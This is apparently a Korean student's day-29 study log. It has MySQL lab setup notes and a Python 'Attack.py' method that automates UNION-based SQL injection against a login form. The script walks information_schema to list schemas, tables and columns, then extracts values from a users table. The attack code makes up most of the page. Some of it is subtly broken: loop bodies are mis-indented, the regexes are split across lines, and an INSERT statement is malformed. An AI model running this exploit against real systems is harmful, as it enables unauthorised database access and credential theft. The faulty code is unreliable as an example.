29일차

29일차

홈으로 돌아가기 

호스트 전용 상태에서 ci4.st.kr로 접속 되도록 할것
호스트 전용의 DNS를 설정해주기
메인PC에 워크벤치 설치해서 접속 되도록 조치 할 것


create user ci4@192.168.56.1 identified by '123456';
grant all on ci4.* to ci4@192.168.56.1;
flush privileges;

CREATE TABLE news (
    idx int(11) NOT NULL AUTO_INCREMENT,
    title varchar(128) NOT NULL,
    slug varchar(128) NOT NULL,
    body text NOT NULL, 
    reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 
    PRIMARY KEY (idx),
    KEY slug (slug)
);
slug : 페이지나 포스트를 설명하는 몇개 단어의 집합
INSERT INTO news VALUES
(1,'','',''),
(2,'','',''),
(3,'','','');
(4,'','',''),
(5,'','',''),
(6,'','','');
(7,'','',''),
(8,'','',''),
(9,'','','');
(10,'','',''),
(11,'','',''),





//Attack.py db공격부분 완성
    def sql(self):
        result=[]
        target="http://web2.st.kr/auth/login2_ok.php"
        sql_in=["' UNION SELECT schema_name,2 from information_schema.schemata#"]
        exclude_schemas = ['information_schema', 'performance_schema']
        for sql in sql_in:
            payload={"id_param":sql,"pw_param":sql}
           # print(sql)
            response=requests.post(target, data=payload)
#            print(response.text)#
#            if "OK" in response.text:
#                print("SQL OK")
#            matches = re.search(r'OK[\s]*
(.*?)
', response.text, re.DOTALL)
            matches = re.findall(r'
(.*?)
', response.text)
            if matches:
#              result_text = matches.group(1)
#              print("OK:", result_text)
                result_array = [schema for schema in matches if schema not in exclude_schemas] # matches
        print(result_array)

#            else:
#               print("No OK tags found.")
        tn_array = []
        for table_name in result_array:
            sql_in = f"' UNION SELECT table_name,2 from information_schema.tables where table_schema='{table_name}'#" 
#            print(sql_in)
            payload = {"id_param": sql_in, "pw_param": sql_in}
            response = requests.post(target, data=payload)
#            print(response.text)
            matches = re.findall(r'
(.*?)
', response.text)
            if matches:
                tn_array.extend(matches)
        print(tn_array)
        cn_array = []
        for table_name in tn_array:
            for column_name in result_array:
#                print({table_name})
                sql_in = f"' UNION SELECT column_name,2 from information_schema.columns where table_schema='{column_name}' and table_name='{table_name}'#"
#            print(sql_in)
            payload = {"id_param": sql_in, "pw_param": sql_in}
            response = requests.post(target, data=payload)
#            print(response.text)
            matches = re.findall(r'
(.*?)
', response.text)
            if matches:
                cn_array.extend(matches)
        print(cn_array)

        id_array = []
        for id_a in cn_array:
#                print({table_name})
            sql_in = f"' UNION SELECT {id_a},{id_a} from users#"
#            print(sql_in)
            payload = {"id_param": sql_in, "pw_param": sql_in}
            response = requests.post(target, data=payload)
#            print(response.text)
            matches = re.findall(r'
(.*?)
', response.text)
            if matches:
                id_array.extend(matches)
                
        print(id_array)
Copyright © snower's Website